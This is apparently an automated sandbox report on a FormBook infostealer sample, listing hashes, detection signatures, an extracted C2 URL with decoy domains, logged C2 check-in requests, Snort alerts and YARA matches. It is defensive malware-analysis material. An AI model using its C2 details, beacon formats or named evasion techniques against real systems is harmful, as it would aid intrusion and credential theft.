Analysis Report UOMp9cDcqZ

Overview

General Information

Sample Name: UOMp9cDcqZ (renamed file extension from none to exe)
Analysis ID: 433343
MD5: 15d907e7d9f8286e5053796c9d78fcec
SHA1: b7d7329e94e2292ed53e2778cebec533ac599030
SHA256: 771e4f69520f71afe6a6e9a4eb4de7dcd8d7521d90db290ca6c27b1a95c532af
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}
Multi AV Scanner detection for submitted file
Source: UOMp9cDcqZ.exe Virustotal: Detection: 16% Perma Link
Source: UOMp9cDcqZ.exe Metadefender: Detection: 22% Perma Link
Source: UOMp9cDcqZ.exe ReversingLabs: Detection: 50%
Yara detected FormBook
Source: Yara match File source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: UOMp9cDcqZ.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: UOMp9cDcqZ.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: UOMp9cDcqZ.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\ESxPeVCqHk\src\obj\x86\Debug\OrderablePartitioner.pdb source: UOMp9cDcqZ.exe
Source: Binary string: colorcpl.pdbGCTL source: UOMp9cDcqZ.exe, 00000002.00000002.315780630.0000000001350000.00000040.00000001.sdmp
Source: Binary string: colorcpl.pdb source: UOMp9cDcqZ.exe, 00000002.00000002.315780630.0000000001350000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: UOMp9cDcqZ.exe, 00000002.00000003.245683230.0000000001050000.00000004.00000001.sdmp, colorcpl.exe, 0000000F.00000002.494600161.00000000046D0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: UOMp9cDcqZ.exe, colorcpl.exe

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 1_2_0E61B6F0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 4x nop then pop edi 2_2_00416282
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 4x nop then pop ebx 2_2_00406A94
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4x nop then pop ebx 15_2_02546A95
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 4x nop then pop edi 15_2_02556282

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49728 -> 52.58.78.16:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49728 -> 52.58.78.16:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49728 -> 52.58.78.16:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.adultpeace.com/p2io/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /p2io/?Y8a0dZ=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21bBg/43M0dy&1bE03H=2d8HJVh0mNdP HTTP/1.1 Host: www.yunlimall.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?Y8a0dZ=QtqXFq7FP4KHNfY3GXms050Yi4WsLwGmbp3RpBBisdkFhqTaD+AYMAmq/Gwss1AnwPhT&1bE03H=2d8HJVh0mNdP HTTP/1.1 Host: www.dmgt4m2g8y2uh.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?Y8a0dZ=ywi4HDlAhD4tPbY4K6H+rd6B6cynTULkanWCLCIOcA07eHcJTX4js3v63TFqYuac8Mmv&1bE03H=2d8HJVh0mNdP HTTP/1.1 Host: www.thesoulrevitalist.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?Y8a0dZ=bSK1RxPJHkVUetqtOJ2LeA3okZHmhG3V4GZ2PZxkhAIUk0ADTbWPbz8cbf4qMx2ahmc0&1bE03H=2d8HJVh0mNdP HTTP/1.1 Host: www.newmopeds.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?Y8a0dZ=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf074xZPwGcUa1&1bE03H=2d8HJVh0mNdP HTTP/1.1 Host: www.cleanxcare.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?Y8a0dZ=WcJiaxtbpXoyrp727GVLONmwQJizIxitcLbcPZwW7N+bpIkBoEIsPrx61ns7CFIdu3au&1bE03H=2d8HJVh0mNdP HTTP/1.1 Host: www.hazard-protection.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 52.58.78.16 52.58.78.16
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: EGIHOSTINGUS EGIHOSTINGUS
Source: Joe Sandbox View ASN Name: BIT-ISLEEquinixJpapanEnterpriseKKJP BIT-ISLEEquinixJpapanEnterpriseKKJP
Source: unknown DNS traffic detected: queries for: clientconfig.passport.net
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETAccess-Control-Allow-Origin: *Access-Control-Allow-Credentials: trueAccess-Control-Allow-Methods: GET, POST, PUT, DELETEAccess-Control-Allow-Headers: AuthorizationDate: Fri, 11 Jun 2021 14:58:19 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 
30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 6
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: UOMp9cDcqZ.exe, 00000001.00000002.248963538.0000000002B61000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: UOMp9cDcqZ.exe, 00000001.00000003.233796502.0000000005B09000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersU
Source: UOMp9cDcqZ.exe, 00000001.00000002.252895146.0000000005B00000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comm
Source: UOMp9cDcqZ.exe, 00000001.00000002.252895146.0000000005B00000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comuev
Source: UOMp9cDcqZ.exe, 00000001.00000003.228190439.0000000005B1B000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: UOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.c
Source: UOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: UOMp9cDcqZ.exe, 00000001.00000003.229871237.0000000005B04000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn.
Source: UOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/
Source: UOMp9cDcqZ.exe, 00000001.00000003.229871237.0000000005B04000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/MI
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: UOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cr
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/&
Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/4
Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp//
Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/liquI
Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/z
Source: UOMp9cDcqZ.exe, 00000001.00000003.228060907.0000000005B1D000.00000004.00000001.sdmp, UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: UOMp9cDcqZ.exe, 00000001.00000003.228060907.0000000005B1D000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.coma-d
Source: UOMp9cDcqZ.exe, 00000001.00000003.228060907.0000000005B1D000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.coms
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: UOMp9cDcqZ.exe, 00000001.00000003.229096064.0000000005B06000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: UOMp9cDcqZ.exe, 00000001.00000003.229096064.0000000005B06000.00000004.00000001.sdmp String found in binary or memory: http://www.sandoll.co.krN.TTFv
Source: explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: UOMp9cDcqZ.exe, 00000001.00000003.228445833.0000000005B1B000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.comn
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
